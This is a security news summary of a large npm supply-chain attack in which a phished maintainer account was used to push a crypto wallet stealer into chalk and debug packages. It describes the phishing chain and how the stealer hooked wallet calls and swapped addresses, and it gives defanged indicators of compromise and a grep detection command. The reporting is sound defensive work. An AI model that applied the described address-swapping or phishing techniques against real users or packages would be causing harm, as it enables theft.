Largest NPM Supply Chain Attack Ever Steals Only 5 Cents—Millions Lost in Cleanup

Source: Largest NPM Supply Chain Attack Steals a Few Cents

Earlier, an attacker successfully hijacked the NPM account qix, which manages widely used packages like chalk and debug-js. Combined, these packages receive over 2 billion weekly downloads, making this breach the largest supply chain attack recorded in history.

How the Breach Happened

• The attacker targeted the package author with a phishing email from support@npmjs[.]help, a malicious domain now offline but originally linked to IP 185.7.81.108.
• The email directed the author to a fake URL resembling NPM's two-factor authentication (2FA) settings page.
• This page loaded malicious scripts from attacker-controlled BunnyCDN buckets (static-mw-host.b-cdn[.]net, img-data-backup.b-cdn[.]net) designed to steal credentials.
• The stolen username, password, and 2FA codes were sent to a remote server at websocket-api2.publicvm[.]com.

Malware Behavior

Instead of traditional malware, the attacker inserted a crypto wallet stealer into the packages:

• Focused solely on web environments - no desktop infection or file access.
• Hooks critical Ethereum wallet functions (request, send, sendAsync) and overrides network calls (fetch, XMLHttpRequest).
• For Ethereum transactions like approve, transfer, and permit, it changes the recipient address to the attacker’s wallet 0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976.
• For Solana transactions, it disrupts transactions by replacing recipient and key info with invalid addresses.
• It also intercepts JSON responses, replacing valid crypto addresses with one of 280 hardcoded attacker addresses via a similarity (Levenshtein) check.

Note: The stealer triggered errors in CI/CD pipelines due to missing runtime checks.

Impact

Surprisingly, the actual stolen amount was only about 5 cents in ETH and $20 in a memecoin, despite the enormous scale of the attack. The financial damage is minimal compared to the likely significant indirect impact-thousands of developer hours to audit and mitigate affected environments, plus contract costs for remediation.

What Maintainers and Users Should Do

• Maintainers can scan locally and in caches for the malware signature, e.g. using:
• grep -R 'checkethereumw' in node_modules
• Tools provided by security researchers like phxgg and AndrewMohawk
• Users must carefully verify all crypto transaction addresses before approving any operation.

Indicators of Compromise (IoCs)

• Malicious domains:
  • npmjs[.]help
  • static-mw-host.b-cdn[.]net
  • img-data-backup.b-cdn[.]net
  • websocket-api2.publicvm[.]com
• Attacker IP: 185.7.81.108
• Attacker Ethereum address: 0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976
• Numerous addresses and wallet identifiers hardcoded in malware

This incident underscores the critical need for vigilance in third-party dependencies and improved developer security training to combat phishing threats.